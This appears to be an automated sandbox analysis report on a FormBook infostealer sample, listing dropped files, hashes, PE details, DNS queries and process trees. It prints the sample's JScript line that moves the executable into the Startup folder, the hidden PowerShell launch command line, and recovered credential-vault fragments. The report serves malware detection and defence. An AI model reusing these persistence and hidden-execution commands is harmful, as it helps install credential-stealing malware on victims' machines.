Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 17500
Entropy (8bit): 5.263894059316795
Encrypted: false
SSDEEP: 384:7t9HXN7JoR1OCrqTn16bTgcy3I1JNHGnudTNWgsF:l7JoaQbTbTXhGudq
MD5: A3A4886985625362491343DE18D47AF4
SHA1: C71CDFA9E19D5FF6A619CBE81FF03BD81FFEA21C
SHA-256: 212BCCE3F0DC1514E26DF84A7CAD58EFD7E61135F79866DC558AD0B18A282546
SHA-512: 91726B8C43F8838AEC88042B96D0440265301016165C782EEC229AA7F349DE8EC7574670486DBDA68B48985A37A19F449AD5F6F561C98B74142F46251C1FC38F
Malicious: false
C:\Users\user\AppData\Local\Temp\863733.js
Process: C:\Users\user\Desktop\f5cZJ0WC0H.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 248
Entropy (8bit): 5.1188385323700585
Encrypted: false
SSDEEP: 6:qoq7yJDIUt7DaJf1ptLNxWDaJ0/hJI5lR9ZQqBptLNswH:JqmIU1W9ptJQW0hOlX+qBptJsM
MD5: 5F82CA9F25869E47D96CA56A06F6C657
SHA1: A00FFBE80DA16370D9B3CC2EB98FBE7E890597F1
SHA-256: 3DFC1D8475A377E654DB459C0C152B08727891632B4A3A4E4C5CF10A40391E2A
SHA-512: EF765B2C3CFA84391E8AC632628A0857E75CF5C339856120859A90CA90415BDD2D1062CF1813B447029C852353FA6B3EE145AF0E4628379F2FDFCAFCD873A81B
Malicious: false
                                                    Preview: var FSO = WScript.CreateObject("Scripting.FileSystemObject"); try { FSO.MoveFile("C:\\Users\\user\\Desktop\\f5cZJ0WC0H.exe", "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\f5cZJ0WC0H.exe");} catch(err) {}
C:\Users\user\AppData\Local\Temp\DB1
Process: C:\Windows\SysWOW64\cmd.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 40960
Entropy (8bit): 0.792852251086831
Encrypted: false
SSDEEP: 48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5: 81DB1710BB13DA3343FC0DF9F00BE49F
SHA1: 9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256: 9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512: CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious: true
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bv45oio5.3oc.ps1
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: very short file (no magic)
Category: dropped
Size (bytes): 1
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3:U:U
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA1: 356A192B7913B04C54574D18C28D46E6395428AB
SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious: false
                                                    Preview: 1
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u1je0or0.ask.psm1
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: very short file (no magic)
Category: dropped
Size (bytes): 1
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3:U:U
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA1: 356A192B7913B04C54574D18C28D46E6395428AB
SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious: false
                                                    Preview: 1
C:\Users\user\AppData\Roaming\7-NB1T71\7-Nlogim.jpeg
Process: C:\Windows\SysWOW64\help.exe
File Type: JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, frames 3
Category: dropped
Size (bytes): 83253
Entropy (8bit): 7.895279141907517
Encrypted: false
SSDEEP: 1536:CWvsYelgSCiWyxzvzCZFB1N091GsVBmtDmaV6mf03PF64DU:ZUl8iWe30BN090+m5ma4PUP
MD5: D89442D664D6DBE514EF71D174C0F42C
SHA1: 862CA2E2F93445F9504A478087A279722E8CA6A3
SHA-256: 9A70E43EBC376F0E7888897AC8FA480931A3F2F92A2BBA63D1B3B81A0D0ADFFC
SHA-512: 7AC56C6879AEB160747850F525DB17BCFEB1B076991E3BBD0D523A2BA7A28ECF5E1AE318FCBF01713DCF5932F59B3A47FC48D6F2794D67878BC42D37E8B9FB90
Malicious: false
C:\Users\user\AppData\Roaming\7-NB1T71\7-Nlogrg.ini
Process: C:\Windows\SysWOW64\help.exe
File Type: data
Category: dropped
Size (bytes): 38
Entropy (8bit): 2.7883088224543333
Encrypted: false
SSDEEP: 3:rFGQJhIl:RGQPY
MD5: 4AADF49FED30E4C9B3FE4A3DD6445EBE
SHA1: 1E332822167C6F351B99615EADA2C30A538FF037
SHA-256: 75034BEB7BDED9AEAB5748F4592B9E1419256CAEC474065D43E531EC5CC21C56
SHA-512: EB5B3908D5E7B43BA02165E092F05578F45F15A148B4C3769036AA542C23A0F7CD2BC2770CF4119A7E437DE3F681D9E398511F69F66824C516D9B451BB95F945
Malicious: false
                                                    Preview: ....C.h.r.o.m.e. .R.e.c.o.v.e.r.y.....
                                                    C:\Users\user\AppData\Roaming\7-NB1T71\7-Nlogri.ini
                                                    Process:C:\Windows\SysWOW64\help.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):40
                                                    Entropy (8bit):2.8420918598895937
                                                    Encrypted:false
                                                    SSDEEP:3:+slXllAGQJhIl:dlIGQPY
                                                    MD5:D63A82E5D81E02E399090AF26DB0B9CB
                                                    SHA1:91D0014C8F54743BBA141FD60C9D963F869D76C9
                                                    SHA-256:EAECE2EBA6310253249603033C744DD5914089B0BB26BDE6685EC9813611BAAE
                                                    SHA-512:38AFB05016D8F3C69D246321573997AAAC8A51C34E61749A02BF5E8B2B56B94D9544D65801511044E1495906A86DC2100F2E20FF4FCBED09E01904CC780FDBAD
                                                    Malicious:true
                                                    Preview: ....I.e.x.p.l.o.r. .R.e.c.o.v.e.r.y.....
                                                    C:\Users\user\AppData\Roaming\7-NB1T71\7-Nlogrv.ini
                                                    Process:C:\Windows\SysWOW64\help.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):210
                                                    Entropy (8bit):3.4515466143119893
                                                    Encrypted:false
                                                    SSDEEP:6:tGQPYlIaExGNlGcQga3Of9y96GO4ClRa/8lMsEoY:MlIaExGNYvOI6x40FlMYY
                                                    MD5:411DA59583A4CFC726E0DD885E007D59
                                                    SHA1:C55665D7F1610C241FE9EED79D26EE35586E90F1
                                                    SHA-256:E1B7F628944DCCD35E0515F88146B4AABFA023180BA2D2BBE118A6BBDAF5482B
                                                    SHA-512:7610378C03D7ABF76FF35B137060540E73C75B3423AFE255B6A94EEE5E9743F73E99A7A4D2233CC956EBCF0089584FD6D6C6CE3F24D5FD1406236F3332555C81
                                                    Malicious:true
                                                    Preview: ...._._.V.a.u.l.t. .R.e.c.o.v.e.r.y.........N.a.m.e.:...M.i.c.r.o.s.o.f.t.A.c.c.o.u.n.t.:.t.a.r.g.e.t.=.S.S.O._.P.O.P._.D.e.v.i.c.e.....I.d.:...0.2.p.u.n.m.v.o.e.k.s.a.x.o.m.e.....A.u.t.:.......P.a.s.s.:.......
                                                    C:\Users\user\Documents\20201127\PowerShell_transcript.216865.DhT+sk6J.20201127155809.txt
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):1463
                                                    Entropy (8bit):5.29590787363706
                                                    Encrypted:false
                                                    SSDEEP:24:BxSAz3yDvBBYx2DOXUBP6IriMzBzuVMeJzW/tHjeTKKjX4CIym1ZJX6BP6IriMzX:BZzav/YoOkVriMzhuDJ6FqDYB1ZUVria
                                                    MD5:B48B1FB348BC25C53163F1A0CE6CD288
                                                    SHA1:2A1699E1FEBE80E279FF61F842ABF8AA086B7620
                                                    SHA-256:850406D1AF6AAB2568D9C02C05492375548C6E7DB61518A462953C9EBB55A0A5
                                                    SHA-512:9EC34FD27417EB722955A9106B8184010CE9A9B5480DC43142CA1276CBCD92336858E7AEBAAC6272BD9A2D16AE3E10A02FE1F74FF7C4765373DAC5BC4EF5116B
                                                    Malicious:false
                                                    Preview: .**********************..Windows PowerShell transcript start..Start time: 20201127155824..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 216865 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -command Start-Process -WindowStyle hidden -FilePath 'C:\Windows\System32\wscript.exe' -ArgumentList 'C:\Users\user\AppData\Local\Temp\\863733.js'; Start-Sleep -s 5; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe'..Process ID: 5972..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20201127155824..**********************..PS>Start-Process -WindowStyle hidden -FilePath 'C:\W

                                                    Static File Info

                                                    General

                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Entropy (8bit):7.801833603864588
                                                    TrID:
                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                    • Win32 Executable (generic) a (10002005/4) 49.78%
                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                    • DOS Executable Generic (2002/1) 0.01%
                                                    File name:f5cZJ0WC0H.exe
                                                    File size:402944
                                                    MD5:0e7d12ad28411f68d62d3d3f17382b98
                                                    SHA1:742c7b23f14ebe783cdef406b073c6e867266657
                                                    SHA256:0f26e91c2b802ec98ff2cc6269ad43f09f29e8827d2975f4e6514db0df14db6c
                                                    SHA512:260f97398c4fc45516c7972faa365d92dcb92ae7aa6e3ecabf2e839bb08f7ea925bd2f56cd234751bec8fcc9bca86d6f5deaeddfdf5f1e1c99e21a97dd469db7
                                                    SSDEEP:6144:ox6uUEXR4gt0m1jp5+Or3cOENFq7sbYLDApPU+HZw/0qfKIV02WaTs:O+w0ajnb35ENys8LcpP5qCIeis
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....$................0......b......R.... ........@.. ....................................@................................

                                                    File Icon

                                                    Icon Hash:6869696969697168

                                                    Static PE Info

                                                    General

                                                    Entrypoint:0x45e152
                                                    Entrypoint Section:.text
                                                    Digitally signed:false
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                    DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                    Time Stamp:0xE41D24F5 [Wed Apr 11 07:34:13 2091 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:v4.0.30319
                                                    OS Version Major:4
                                                    OS Version Minor:0
                                                    File Version Major:4
                                                    File Version Minor:0
                                                    Subsystem Version Major:4
                                                    Subsystem Version Minor:0
                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                    Entrypoint Preview

                                                    Instruction
                                                    jmp dword ptr [00402000h]
                                                    inc esp
                                                    aaa
                                                    pop esi
                                                    and eax, 00003537h

                                                    Data Directories

                                                    Name | Virtual Address | Virtual Size | Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT | 0x5e0ff | 0x4f | .text
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x60000 | 0x5e1c | .rsrc
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x66000 | 0xc | .reloc
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG | 0x5e068 | 0x38 | .text
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                                    Sections

                                                    Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                    .text | 0x2000 | 0x5c160 | 0x5c200 | False | 0.950246989484 | data | 7.93997758183 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                    .rsrc | 0x60000 | 0x5e1c | 0x6000 | False | 0.0560709635417 | data | 2.7254040689 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .reloc | 0x66000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                    Resources

                                                    Name | RVA | Size | Type | Language | Country
                                                    RT_ICON | 0x60140 | 0x468 | GLS_BINARY_LSB_FIRST | |
                                                    RT_ICON | 0x605b8 | 0x10a8 | data | |
                                                    RT_ICON | 0x61670 | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 4294967295 | |
                                                    RT_GROUP_ICON | 0x658a8 | 0x30 | data | |
                                                    RT_VERSION | 0x658e8 | 0x334 | data | |
                                                    RT_MANIFEST | 0x65c2c | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |

                                                    Imports

                                                    DLL | Import
                                                    mscoree.dll | _CorExeMain

                                                    Version Infos

                                                    Description | Data
                                                    Translation | 0x0000 0x04b0
                                                    LegalCopyright | Copyright Microsoft 2020
                                                    Assembly Version | 0.0.0.0
                                                    InternalName | Testeconnect.exe
                                                    FileVersion | 0.0.0.0
                                                    CompanyName | Microsoft
                                                    Comments |
                                                    ProductName | Testeconnect
                                                    ProductVersion | 0.0.0.0
                                                    FileDescription | Testeconnect
                                                    OriginalFilename | Testeconnect.exe

                                                    Network Behavior

                                                    Snort IDS Alerts

                                                    Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                                    11/27/20-16:00:04.100437 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49733 | 34.98.99.30 | 192.168.2.5

                                                    Network Port Distribution

                                                    UDP Packets

                                                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                    Nov 27, 2020 15:58:11.704583883 CET | 61733 | 53 | 192.168.2.5 | 8.8.8.8
                                                    Nov 27, 2020 15:58:11.741791964 CET | 53 | 61733 | 8.8.8.8 | 192.168.2.5
                                                    Nov 27, 2020 15:58:12.514935970 CET | 65447 | 53 | 192.168.2.5 | 8.8.8.8
                                                    Nov 27, 2020 15:58:12.550602913 CET | 53 | 65447 | 8.8.8.8 | 192.168.2.5
                                                    Nov 27, 2020 15:58:13.593369007 CET | 52441 | 53 | 192.168.2.5 | 8.8.8.8
                                                    Nov 27, 2020 15:58:13.628959894 CET | 53 | 52441 | 8.8.8.8 | 192.168.2.5
                                                    Nov 27, 2020 15:58:15.540461063 CET | 62176 | 53 | 192.168.2.5 | 8.8.8.8
                                                    Nov 27, 2020 15:58:15.567548990 CET | 53 | 62176 | 8.8.8.8 | 192.168.2.5
                                                    Nov 27, 2020 15:58:16.313227892 CET | 59596 | 53 | 192.168.2.5 | 8.8.8.8
                                                    Nov 27, 2020 15:58:16.340348959 CET | 53 | 59596 | 8.8.8.8 | 192.168.2.5
                                                    Nov 27, 2020 15:58:17.079448938 CET | 65296 | 53 | 192.168.2.5 | 8.8.8.8
                                                    Nov 27, 2020 15:58:17.106522083 CET | 53 | 65296 | 8.8.8.8 | 192.168.2.5
                                                    Nov 27, 2020 15:58:17.113156080 CET | 63183 | 53 | 192.168.2.5 | 8.8.8.8
                                                    Nov 27, 2020 15:58:17.140243053 CET | 53 | 63183 | 8.8.8.8 | 192.168.2.5
                                                    Nov 27, 2020 15:58:17.956078053 CET | 60151 | 53 | 192.168.2.5 | 8.8.8.8
                                                    Nov 27, 2020 15:58:17.982995987 CET | 53 | 60151 | 8.8.8.8 | 192.168.2.5
                                                    Nov 27, 2020 15:58:22.689755917 CET | 56969 | 53 | 192.168.2.5 | 8.8.8.8
                                                    Nov 27, 2020 15:58:22.725228071 CET | 53 | 56969 | 8.8.8.8 | 192.168.2.5
                                                    Nov 27, 2020 15:58:27.461447954 CET | 55161 | 53 | 192.168.2.5 | 8.8.8.8
                                                    Nov 27, 2020 15:58:27.488596916 CET | 53 | 55161 | 8.8.8.8 | 192.168.2.5
                                                    Nov 27, 2020 15:58:38.715620041 CET | 54757 | 53 | 192.168.2.5 | 8.8.8.8
                                                    Nov 27, 2020 15:58:38.759673119 CET | 53 | 54757 | 8.8.8.8 | 192.168.2.5
                                                    Nov 27, 2020 15:58:39.898868084 CET | 49992 | 53 | 192.168.2.5 | 8.8.8.8
                                                    Nov 27, 2020 15:58:39.934576988 CET | 53 | 49992 | 8.8.8.8 | 192.168.2.5
                                                    Nov 27, 2020 15:58:39.991681099 CET | 60075 | 53 | 192.168.2.5 | 8.8.8.8
                                                    Nov 27, 2020 15:58:40.018670082 CET | 53 | 60075 | 8.8.8.8 | 192.168.2.5
                                                    Nov 27, 2020 15:58:40.416693926 CET | 55016 | 53 | 192.168.2.5 | 8.8.8.8
                                                    Nov 27, 2020 15:58:40.454010010 CET | 53 | 55016 | 8.8.8.8 | 192.168.2.5
                                                    Nov 27, 2020 15:58:41.937921047 CET | 64345 | 53 | 192.168.2.5 | 8.8.8.8
                                                    Nov 27, 2020 15:58:41.965107918 CET | 53 | 64345 | 8.8.8.8 | 192.168.2.5
                                                    Nov 27, 2020 15:58:43.247811079 CET | 57128 | 53 | 192.168.2.5 | 8.8.8.8
                                                    Nov 27, 2020 15:58:43.285531998 CET | 53 | 57128 | 8.8.8.8 | 192.168.2.5
                                                    Nov 27, 2020 15:58:44.801865101 CET | 54791 | 53 | 192.168.2.5 | 8.8.8.8
                                                    Nov 27, 2020 15:58:44.838902950 CET | 53 | 54791 | 8.8.8.8 | 192.168.2.5
                                                    Nov 27, 2020 15:58:46.267684937 CET | 50463 | 53 | 192.168.2.5 | 8.8.8.8
                                                    Nov 27, 2020 15:58:46.295098066 CET | 53 | 50463 | 8.8.8.8 | 192.168.2.5
                                                    Nov 27, 2020 15:58:50.363706112 CET | 50394 | 53 | 192.168.2.5 | 8.8.8.8
                                                    Nov 27, 2020 15:58:50.399286032 CET | 53 | 50394 | 8.8.8.8 | 192.168.2.5
                                                    Nov 27, 2020 15:58:51.365739107 CET | 58530 | 53 | 192.168.2.5 | 8.8.8.8
                                                    Nov 27, 2020 15:58:51.400971889 CET | 53 | 58530 | 8.8.8.8 | 192.168.2.5
                                                    Nov 27, 2020 15:59:43.197056055 CET | 53813 | 53 | 192.168.2.5 | 8.8.8.8
                                                    Nov 27, 2020 15:59:43.249634027 CET | 53 | 53813 | 8.8.8.8 | 192.168.2.5
                                                    Nov 27, 2020 15:59:45.697555065 CET | 63732 | 53 | 192.168.2.5 | 8.8.8.8
                                                    Nov 27, 2020 15:59:45.746679068 CET | 53 | 63732 | 8.8.8.8 | 192.168.2.5
                                                    Nov 27, 2020 15:59:45.757137060 CET | 57344 | 53 | 192.168.2.5 | 8.8.8.8
                                                    Nov 27, 2020 15:59:45.792571068 CET | 53 | 57344 | 8.8.8.8 | 192.168.2.5
                                                    Nov 27, 2020 16:00:03.926004887 CET | 54450 | 53 | 192.168.2.5 | 8.8.8.8
                                                    Nov 27, 2020 16:00:03.966118097 CET | 53 | 54450 | 8.8.8.8 | 192.168.2.5

                                                    DNS Queries

                                                    Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                                    Nov 27, 2020 15:58:43.247811079 CET | 192.168.2.5 | 8.8.8.8 | 0x4a26 | Standard query (0) | g.msn.com | A (IP address) | IN (0x0001)
                                                    Nov 27, 2020 15:59:43.197056055 CET | 192.168.2.5 | 8.8.8.8 | 0xb5de | Standard query (0) | www.therealnarzkollections.com | A (IP address) | IN (0x0001)
                                                    Nov 27, 2020 15:59:45.697555065 CET | 192.168.2.5 | 8.8.8.8 | 0xc60b | Standard query (0) | www.therealnarzkollections.com | A (IP address) | IN (0x0001)
                                                    Nov 27, 2020 15:59:45.757137060 CET | 192.168.2.5 | 8.8.8.8 | 0x7987 | Standard query (0) | www.therealnarzkollections.com | A (IP address) | IN (0x0001)
                                                    Nov 27, 2020 16:00:03.926004887 CET | 192.168.2.5 | 8.8.8.8 | 0xe237 | Standard query (0) | www.procertinspections.com | A (IP address) | IN (0x0001)

                                                    DNS Answers

                                                    Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                                    Nov 27, 2020 15:58:43.285531998 CET | 8.8.8.8 | 192.168.2.5 | 0x4a26 | No error (0) | g.msn.com | g-msn-com-nsatc.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001)
                                                    Nov 27, 2020 15:59:43.249634027 CET | 8.8.8.8 | 192.168.2.5 | 0xb5de | Name error (3) | www.therealnarzkollections.com | none | none | A (IP address) | IN (0x0001)
                                                    Nov 27, 2020 15:59:45.746679068 CET | 8.8.8.8 | 192.168.2.5 | 0xc60b | Name error (3) | www.therealnarzkollections.com | none | none | A (IP address) | IN (0x0001)
                                                    Nov 27, 2020 15:59:45.792571068 CET | 8.8.8.8 | 192.168.2.5 | 0x7987 | Name error (3) | www.therealnarzkollections.com | none | none | A (IP address) | IN (0x0001)
                                                    Nov 27, 2020 16:00:03.966118097 CET | 8.8.8.8 | 192.168.2.5 | 0xe237 | No error (0) | www.procertinspections.com | procertinspections.com | | CNAME (Canonical name) | IN (0x0001)
                                                    Nov 27, 2020 16:00:03.966118097 CET | 8.8.8.8 | 192.168.2.5 | 0xe237 | No error (0) | procertinspections.com | | 34.98.99.30 | A (IP address) | IN (0x0001)

                                                    Code Manipulations

                                                    User Modules

                                                    Hook Summary

                                                    Function Name | Hook Type | Active in Processes
                                                    PeekMessageA | INLINE | explorer.exe
                                                    PeekMessageW | INLINE | explorer.exe
                                                    GetMessageW | INLINE | explorer.exe
                                                    GetMessageA | INLINE | explorer.exe

                                                    Processes

                                                    Process: explorer.exe, Module: user32.dll
                                                    Function Name | Hook Type | New Data
                                                    PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x82 0x2E 0xE0
                                                    PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x8A 0xAE 0xE0
                                                    GetMessageW | INLINE | 0x48 0x8B 0xB8 0x8A 0xAE 0xE0
                                                    GetMessageA | INLINE | 0x48 0x8B 0xB8 0x82 0x2E 0xE0

                                                    Statistics

                                                    CPU Usage


                                                    Memory Usage


                                                    High Level Behavior Distribution


                                                    Behavior


                                                    System Behavior

                                                    General

                                                    Start time:15:57:57
                                                    Start date:27/11/2020
                                                    Path:C:\Users\user\Desktop\f5cZJ0WC0H.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:'C:\Users\user\Desktop\f5cZJ0WC0H.exe'
                                                    Imagebase:0xf40000
                                                    File size:402944 bytes
                                                    MD5 hash:0E7D12AD28411F68D62D3D3F17382B98
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:.Net C# or VB.NET
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.247225412.00000000044D6000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.247225412.00000000044D6000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.247225412.00000000044D6000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.246128519.0000000004389000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.246128519.0000000004389000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.246128519.0000000004389000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    Reputation:low

                                                    General

                                                    Start time:15:58:01
                                                    Start date:27/11/2020
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:cmd.exe /c timeout 5 & powershell -command Start-Process -WindowStyle hidden -FilePath 'C:\Windows\System32\wscript.exe' -ArgumentList 'C:\Users\user\AppData\Local\Temp\\863733.js'; Start-Sleep -s 5; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe'
                                                    Imagebase:0x150000
                                                    File size:232960 bytes
                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    General

                                                    Start time:15:58:01
                                                    Start date:27/11/2020
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff64e5e0000
                                                    File size:625664 bytes
                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    General

                                                    Start time:15:58:02
                                                    Start date:27/11/2020
                                                    Path:C:\Windows\SysWOW64\timeout.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:timeout 5
                                                    Imagebase:0xf70000
                                                    File size:26112 bytes
                                                    MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    General

                                                    Start time:15:58:07
                                                    Start date:27/11/2020
                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:powershell -command Start-Process -WindowStyle hidden -FilePath 'C:\Windows\System32\wscript.exe' -ArgumentList 'C:\Users\user\AppData\Local\Temp\\863733.js'; Start-Sleep -s 5; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe'
                                                    Imagebase:0x300000
                                                    File size:430592 bytes
                                                    MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:.Net C# or VB.NET
                                                    Reputation:high

                                                    General

                                                    Start time:15:58:37
                                                    Start date:27/11/2020
                                                    Path:C:\Windows\SysWOW64\wscript.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:'C:\Windows\System32\wscript.exe' C:\Users\user\AppData\Local\Temp\\863733.js
                                                    Imagebase:0x30000
                                                    File size:147456 bytes
                                                    MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    General

                                                    Start time:15:58:43
                                                    Start date:27/11/2020
                                                    Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe'
                                                    Imagebase:0x230000
                                                    File size:402944 bytes
                                                    MD5 hash:0E7D12AD28411F68D62D3D3F17382B98
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:.Net C# or VB.NET
